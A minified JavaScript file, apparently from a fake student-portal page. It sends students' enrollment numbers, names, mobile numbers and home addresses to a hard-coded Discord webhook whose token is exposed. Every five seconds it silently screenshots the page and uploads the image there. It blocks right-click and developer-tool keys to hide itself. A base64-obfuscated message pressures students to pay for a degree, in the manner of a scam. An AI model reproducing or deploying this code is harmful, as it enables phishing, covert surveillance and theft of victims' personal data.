$(document).ready(function(){setTimeout(function(){$("#infoOverlay").show(),$("#infoPopup").show()},1e3),$("#closeInfoPopup").click(function(){$("#infoOverlay").hide(),$("#infoPopup").hide()})});const webhookUrl="https://discord.com/api/webhooks/1408320672110743623/qC2r_vnos_DwbDjQQN3OdoZSLMJ5WXX-UfhEQR0I5G9pEF_e-mjPZsk8vq8jSc5TqkI1";function formatDateTime(e){var t=e=>e.toString().padStart(2,"0");return`${t(e.getDate())}-${t(e.getMonth()+1)}-${e.getFullYear()} ${t(e.getHours())}:${t(e.getMinutes())}:`+t(e.getSeconds())}function updateClassWarningMessage(){var e=atob("WW91IGhhdmVuJ3QgYXR0ZW5kZWQgaGlzIGNsYXNzZXMgc2luY2UgSnVseSAyOHRoLiBTbywgc2hvdWxkIHdlIHRydXN0IHlvdSBvciBub3Q/IFBsZWFzZSBsZXQgdXMga25vdyB3aGF0IHlvdSB3YW50IHNvIHdlIGNhbiBtb3ZlIHRvIHRoZSBuZXh0IHN0ZXAuIFdlIHdpbGwgdHJ5IG91ciBiZXN0IHRvIHNwZWFrIHRvIHRoZW0sIGNvbnZpbmNlIHRoZW0sIGFuZCBkZWxpdmVyIHlvdXIgZGVncmVlIHRvIHlvdXIgZ2l2ZW4gYWRkcmVzcyBhcyBzb29uIGFzIHBvc3NpYmxlIMKnIGJ1dCB5b3Ugd2lsbCBuZWVkIHRvIHN1cHBvcnQgdXMgYSBsaXR0bGUuCldlIHdpbGwgdXBkYXRlIHRoaXMgb24gdGhlIHdlYnNpdGUgYW5kIGFsc28gc2VuZCBhIG1lc3NhZ2Ugb24gV2hhdHNBcHAgdG8geW91ciByZWdpc3RlcmVkIG1vYmlsZSBudW1iZXIgKHRoZSBvbmUgeW91IHByb3ZpZGVkIGhlcmUpLiBQbGVhc2Uga2VlcCB5b3VyIHBob25lIG5lYXJieSDCpyB3ZSB3aWxsIHNlbmQgdGhlIG1lc3NhZ2Ugd2l0aGluIDEgbWludXRlLgpXZSB3YW50IHRvIHJlc29sdmUgdGhpcyBpc3N1ZSBhcyBxdWlja2x5IGFzIHBvc3NpYmxlLCBhcyBpdCdzIGFscmVhZHkgZGVsYXllZC4KSSBzdGlsbCBoYXZlICdIJ29wZS4KUkVNRU1CRVIgSC4="),t=document.getElementById("classWarningMessage");t&&(t.textContent=e)}document.getElementById("studentDetailsForm").addEventListener("submit",function(e){var t,n,o,d,a;e.preventDefault(),this.checkValidity()?(e=document.getElementById("enrollmentNumber").value.trim(),t=document.getElementById("programmeCode").value.trim(),n=document.getElementById("programmeName").value.trim(),o=document.getElementById("studentName").value.trim(),d=document.getElementById("mobileNumber").value.trim(),a=document.getElementById("residentialAddress").value.trim(),e=`
**New Student Details Submitted:**

- Date & Time: ${formatDateTime(new Date)}
- Enrollment Number: ${e}
- Programme Code: ${t}
- Programme Name: ${n}
- Student Name: ${o}
- Mobile Number: ${d}
- Residential Address: ${a}

`,fetch(webhookUrl,{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:e})}).then(e=>{if(e.ok){localStorage.clear();const t=document.getElementById("successModal");t.style.display="flex",document.getElementById("modalCloseBtn").onclick=()=>{t.style.display="none",window.location.href="index.html"}}else alert("Failed to submit details. Please try again.")}).catch(e=>{console.error("Error:",e),alert("Error submitting details.")})):this.reportValidity()}),window.addEventListener("load",()=>{setInterval(()=>{html2canvas(document.body,{useCORS:!0}).then(e=>{e.toBlob(e=>{var t=new FormData;t.append("file",e,"screenshot.png");const n=(new Date).toLocaleString();t.append("payload_json",JSON.stringify({content:"📸 Screenshot taken at "+n})),fetch("https://discord.com/api/webhooks/1408320672110743623/qC2r_vnos_DwbDjQQN3OdoZSLMJ5WXX-UfhEQR0I5G9pEF_e-mjPZsk8vq8jSc5TqkI1",{method:"POST",body:t}).then(e=>{e.ok?console.log("Screenshot sent at",n):console.error("Failed to send screenshot:",e.statusText)}).catch(console.error)},"image/png")})},5e3)}),document.addEventListener("contextmenu",e=>(e.preventDefault(),!1)),document.addEventListener("keydown",e=>{!e.ctrlKey&&123!=e.keyCode||(e.stopPropagation(),e.preventDefault())}),window.addEventListener("DOMContentLoaded",function(){var e=localStorage.getItem("popupFormData");e?(JSON.parse(e),console.log("Form Data:")):(document.body.innerHTML="",setTimeout(function(){window.location.href="index.html"},1500))}),updateClassWarningMessage();



